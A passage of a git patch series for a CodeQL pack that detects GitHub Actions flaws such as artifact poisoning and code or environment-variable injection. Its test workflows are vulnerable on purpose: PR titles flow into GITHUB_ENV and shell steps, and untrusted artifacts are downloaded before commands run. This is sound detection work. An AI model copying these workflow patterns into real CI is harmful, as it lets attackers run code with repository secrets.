job.getWorkflow().getATriggerEvent() = "workflow_run" and + (run instanceof Run or run instanceof UsesStep) and + exists(int i, int j | + job.getStep(i) = download and + job.getStep(j) = run and + i < j + ) +select download, "Potential artifact poisoning." diff --git a/ql/src/Security/CWE-829/UntrustedCheckout.ql b/ql/src/Security/CWE-829/UntrustedCheckout.ql index b33c7325526d..86b80c672157 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckout.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckout.ql @@ -5,7 +5,7 @@ * that is able to push to the base repository and to access secrets. * @kind problem * @problem.severity warning - * @precision low + * @precision medium * @security-severity 9.3 * @id actions/untrusted-checkout * @tags actions diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test1.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test1.yml index b2780d54c045..3cab86f3171b 100644 --- a/ql/test/query-tests/Security/CWE-077/.github/workflows/test1.yml +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test1.yml @@ -21,5 +21,7 @@ jobs: - name: Extract Jira Key run: echo ISSUE_KEY=$(echo "${{ github.event.pull_request.title }}") >> $GITHUB_ENV + - name: Sink + run: echo ${{ env.ISSUE_KEY }} diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected new file mode 100644 index 000000000000..2d96ec5a4352 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected @@ -0,0 +1,6 @@ +edges +nodes +| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +subpaths +#select +| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | diff --git a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected new file mode 100644 index 000000000000..2692d03eefec --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected @@ -0,0 +1,6 @@ +edges +nodes +| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +subpaths +#select +| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml index d656fb65ea51..1ad46b0f6eb1 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml @@ -36,7 +36,7 @@ jobs: if: ${{ always() }} - needs: job + needs: job1 steps: - id: sink diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test1.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test1.yml new file mode 100644 index 000000000000..3cab86f3171b --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test1.yml @@ -0,0 +1,27 @@ +name: Pull Request Open + +on: + pull_request_target: + branches: + - main + - 14.0.x + + types: + - opened + - reopened + +jobs: + updateJira: + if: github.actor != 'dependabot[bot]' + runs-on: ubuntu-latest + steps: + - name: Checkout repository + uses: actions/checkout@v4 + + - name: Extract Jira Key + run: echo ISSUE_KEY=$(echo "${{ github.event.pull_request.title }}") >> $GITHUB_ENV + + - name: Sink + run: echo ${{ env.ISSUE_KEY }} + + diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected index 2ad850548037..1fad288860e7 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected @@ -50,6 +50,7 @@ edges | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | +| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | | .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | @@ -185,6 +186,9 @@ nodes | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | +| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | semmle.label | env.ISSUE_KEY | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | semmle.label | steps.step2.outputs.test | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | @@ -282,6 +286,8 @@ subpaths | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | +| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | +| .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | ${{ env.ISSUE_KEY }} | | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | diff --git a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected index 7061f509b812..25441104064a 100644 --- a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected @@ -50,6 +50,7 @@ edges | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | +| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | | .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | @@ -185,6 +186,9 @@ nodes | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | +| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | semmle.label | env.ISSUE_KEY | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | semmle.label | steps.step2.outputs.test | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | @@ -281,6 +285,8 @@ subpaths | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | +| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | +| .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | ${{ env.ISSUE_KEY }} | | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning1.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning1.yml new file mode 100644 index 000000000000..4755350f0fc8 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning1.yml @@ -0,0 +1,34 @@ +name: Pull Request Open + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - uses: actions/github-script@v6 + with: + script: | + let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: context.payload.workflow_run.id, + }); + let matchArtifact = allArtifacts.data.artifacts.filter((artifact) => { + return artifact.name == "" + })[0]; + let download = await github.rest.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifact.id, + archive_format: 'zip', + }); + - name: Run command + run: cmd + + + diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning2.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning2.yml new file mode 100644 index 000000000000..725038ab8165 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning2.yml @@ -0,0 +1,21 @@ +name: Pull Request Open + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - uses: dawidd6/action-download-artifact@v2 + with: + name: artifact_name + workflow: wf.yml + - name: Run command + run: cmd + + + diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning3.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning3.yml new file mode 100644 index 000000000000..4d2a9774753a --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning3.yml @@ -0,0 +1,19 @@ +name: Pull Request Open + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - run: | + gh run download "${WORKFLOW_RUN_ID}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" + - name: Run command + run: cmd + + + diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning4.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning4.yml new file mode 100644 index 000000000000..26d342f7060c --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning4.yml @@ -0,0 +1,25 @@ +name: Pull Request Open + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - run: | + artifacts_url=${{ github.event.workflow_run.artifacts_url }} + gh api "$artifacts_url" -q '.artifacts[] | [.name, .archive_download_url] | @tsv' | while read artifact + do + IFS=$'\t' read name url <<< "$artifact" + gh api $url > "$name.zip" + unzip -d "$name" "$name.zip" + done + - name: Run command + run: cmd + + + diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test1.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test1.yml new file mode 100644 index 000000000000..3cab86f3171b --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test1.yml @@ -0,0 +1,27 @@ +name: Pull Request Open + +on: + pull_request_target: + branches: + - main + - 14.0.x + + types: + - opened + - reopened + +jobs: + updateJira: + if: github.actor != 'dependabot[bot]' + runs-on: ubuntu-latest + steps: + - name: Checkout repository + uses: actions/checkout@v4 + + - name: Extract Jira Key + run: echo ISSUE_KEY=$(echo "${{ github.event.pull_request.title }}") >> $GITHUB_ENV + + - name: Sink + run: echo ${{ env.ISSUE_KEY }} + + diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected new file mode 100644 index 000000000000..8113215481c1 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected @@ -0,0 +1,4 @@ +| .github/workflows/artifactpoisoning1.yml:13:9:30:6 | Uses Step | Potential artifact poisoning. | +| .github/workflows/artifactpoisoning2.yml:13:9:17:6 | Uses Step | Potential artifact poisoning. | +| .github/workflows/artifactpoisoning3.yml:13:9:15:6 | Run Step | Potential artifact poisoning. | +| .github/workflows/artifactpoisoning4.yml:13:9:21:6 | Run Step | Potential artifact poisoning. | diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.qlref b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.qlref new file mode 100644 index 000000000000..21d37e957a1c --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.qlref @@ -0,0 +1,2 @@ +Security/CWE-829/ArtifactPoisoning.ql + diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index c3a3ec2f988c..5a572edf423f 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected @@ -1,5 +1,6 @@ | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Uses Step | | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Uses Step | +| .github/workflows/artifactpoisoning2.yml:13:9:17:6 | Uses Step | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning2.yml:13:9:17:6 | Uses Step | Uses Step | | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'codecov/codecov-action' with ref 'v3', not a pinned commit hash | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Uses Step | | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Unpinned 3rd party Action 'Python CI' step $@ uses 'peter-evans/create-pull-request' with ref 'v5', not a pinned commit hash | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Uses Step: create_pr | | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'thollander/actions-comment-pull-request' with ref 'v2', not a pinned commit hash | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Uses Step | From 2a1226c37a65cd5fab9b400845da5bbe692669bc Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 2 Apr 2024 12:54:42 +0200 Subject: [PATCH 142/707] Add workflow_dispatch to the triggers for artifact poisoning --- ql/src/Security/CWE-829/ArtifactPoisoning.ql | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/ql/src/Security/CWE-829/ArtifactPoisoning.ql b/ql/src/Security/CWE-829/ArtifactPoisoning.ql index 5b0c4fc4e69b..348b6bbdf08a 100644 --- a/ql/src/Security/CWE-829/ArtifactPoisoning.ql +++ b/ql/src/Security/CWE-829/ArtifactPoisoning.ql @@ -16,7 +16,7 @@ import codeql.actions.security.ArtifactPoisoningQuery from LocalJob job, ArtifactDownloadStep download, Step run where - job.getWorkflow().getATriggerEvent() = "workflow_run" and + job.getWorkflow().getATriggerEvent() = ["workflow_run", "workflow_dispatch"] and (run instanceof Run or run instanceof UsesStep) and exists(int i, int j | job.getStep(i) = download and From a2bbf704ee0f488030c27bf928dbaa5c2550d0a3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 3 Apr 2024 11:39:35 +0200 Subject: [PATCH 143/707] fix: triggering events for artifact poisoning --- ql/src/Security/CWE-829/ArtifactPoisoning.ql | 22 ++++++++++++++++++-- 1 file changed, 20 insertions(+), 2 deletions(-) diff --git a/ql/src/Security/CWE-829/ArtifactPoisoning.ql b/ql/src/Security/CWE-829/ArtifactPoisoning.ql index 348b6bbdf08a..5b71a64d52e4 100644 --- a/ql/src/Security/CWE-829/ArtifactPoisoning.ql +++ b/ql/src/Security/CWE-829/ArtifactPoisoning.ql @@ -14,9 +14,27 @@ import actions import codeql.actions.security.ArtifactPoisoningQuery -from LocalJob job, ArtifactDownloadStep download, Step run +predicate isSingleTriggerWorkflow(Workflow w, string trigger) { + w.getATriggerEvent() = trigger and + count(string t | w.getATriggerEvent() = t | t) = 1 +} + +from Workflow w, LocalJob job, ArtifactDownloadStep download, Step run where - job.getWorkflow().getATriggerEvent() = ["workflow_run", "workflow_dispatch"] and + w = job.getWorkflow() and + ( + // The Workflow is triggered by an event other than `pull_request` + not isSingleTriggerWorkflow(w, "pull_request") + or + // The Workflow is only triggered by `workflow_call` and there is + // a caller workflow triggered by an event other than `pull_request` + isSingleTriggerWorkflow(w, "workflow_call") and + exists(ExternalJob call, Workflow caller | + call.getCallee() = w.getLocation().getFile().getRelativePath() and + caller = call.getWorkflow() and + not isSingleTriggerWorkflow(caller, "pull_request") + ) + ) and (run instanceof Run or run instanceof UsesStep) and exists(int i, int j | job.getStep(i) = download and From 119c7b81586a064426f4e10aef033d2101a4f8bf Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 3 Apr 2024 11:41:42 +0200 Subject: [PATCH 144/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 7d2de60df75c..e99a12dda08d 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.4 +version: 0.0.5 dependencies: codeql/controlflow: "*" codeql/dataflow: "*" diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index f36c119e7202..e37339e16cbc 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.4 +version: 0.0.5 groups: - actions - queries From 2988bc8885d51529ea9b998076e8b3744e27fd28 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 3 Apr 2024 15:39:00 +0200 Subject: [PATCH 145/707] Centralize isPrivileged decisions --- ql/lib/codeql/actions/Ast.qll | 21 +++++ ql/lib/codeql/actions/ast/internal/Ast.qll | 7 +- ql/src/Security/CWE-077/EnvVarInjection.ql | 11 ++- .../CWE-077/PrivilegedEnvVarInjection.ql | 13 ++- ql/src/Security/CWE-078/CommandInjection.ql | 11 ++- .../CWE-078/PrivilegedCommandInjection.ql | 13 ++- ql/src/Security/CWE-094/CodeInjection.ql | 11 ++- .../CWE-094/PrivilegedCodeInjection.ql | 13 ++- ql/src/Security/CWE-829/ArtifactPoisoning.ql | 22 +---- ql/src/Security/CWE-829/UntrustedCheckout.ql | 19 +--- .../Security/CWE-077/EnvVarInjection.expected | 1 - .../CWE-078/CommandInjection.expected | 1 - .../Security/CWE-094/CodeInjection.expected | 87 ------------------- 13 files changed, 75 insertions(+), 155 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index d865eb54905b..17768245fdca 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -35,6 +35,8 @@ class AstNode instanceof AstNodeImpl { Workflow getEnclosingWorkflow() { result = super.getEnclosingWorkflow() } + CompositeAction getEnclosingCompositeAction() { result = super.getEnclosingCompositeAction() } + Expression getInScopeEnvVarExpr(string name) { result = super.getInScopeEnvVarExpr(name) } } @@ -123,6 +125,25 @@ class Workflow extends AstNode instanceof WorkflowImpl { Permissions getPermissions() { result = super.getPermissions() } Strategy getStrategy() { result = super.getStrategy() } + + predicate hasSingleTrigger(string trigger) { + this.getATriggerEvent() = trigger and + count(string t | this.getATriggerEvent() = t | t) = 1 + } + + predicate isPrivileged() { + // The Workflow is triggered by an event other than `pull_request` + not this.hasSingleTrigger("pull_request") + or + // The Workflow is only triggered by `workflow_call` and there is + // a caller workflow triggered by an event other than `pull_request` + this.hasSingleTrigger("workflow_call") and + exists(ExternalJob call, Workflow caller | + call.getCallee() = this.getLocation().getFile().getRelativePath() and + caller = call.getWorkflow() and + not caller.hasSingleTrigger("pull_request") + ) + } } class ReusableWorkflow extends Workflow instanceof ReusableWorkflowImpl { diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index a1470a41dd0f..3f9293bc972a 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -95,10 +95,15 @@ abstract class AstNodeImpl extends TAstNode { JobImpl getEnclosingJob() { result.getAChildNode*() = this.getParentNode() } /** - * Gets the enclosing workflow statement. + * Gets the enclosing workflow if any. */ WorkflowImpl getEnclosingWorkflow() { this = result.getAChildNode*() } + /** + * Gets the enclosing composite action if any. + */ + CompositeActionImpl getEnclosingCompositeAction() { this = result.getAChildNode*() } + /** * Gets a environment variable expression by name in the scope of the current node. */ diff --git a/ql/src/Security/CWE-077/EnvVarInjection.ql b/ql/src/Security/CWE-077/EnvVarInjection.ql index 2e978ad9e53f..e758932b208a 100644 --- a/ql/src/Security/CWE-077/EnvVarInjection.ql +++ b/ql/src/Security/CWE-077/EnvVarInjection.ql @@ -17,7 +17,16 @@ import codeql.actions.security.EnvVarInjectionQuery import EnvVarInjectionFlow::PathGraph from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink -where EnvVarInjectionFlow::flowPath(source, sink) +where + EnvVarInjectionFlow::flowPath(source, sink) and + ( + exists(source.getNode().asExpr().getEnclosingCompositeAction()) + or + exists(Workflow w | + w = source.getNode().asExpr().getEnclosingWorkflow() and + not w.isPrivileged() + ) + ) select sink.getNode(), source, sink, "Potential environment variable injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql b/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql index 6508b4586292..811a6f65c7c0 100644 --- a/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql +++ b/ql/src/Security/CWE-077/PrivilegedEnvVarInjection.ql @@ -16,16 +16,13 @@ import actions import codeql.actions.security.EnvVarInjectionQuery import EnvVarInjectionFlow::PathGraph -predicate isSingleTriggerWorkflow(Workflow w, string trigger) { - w.getATriggerEvent() = trigger and - count(string t | 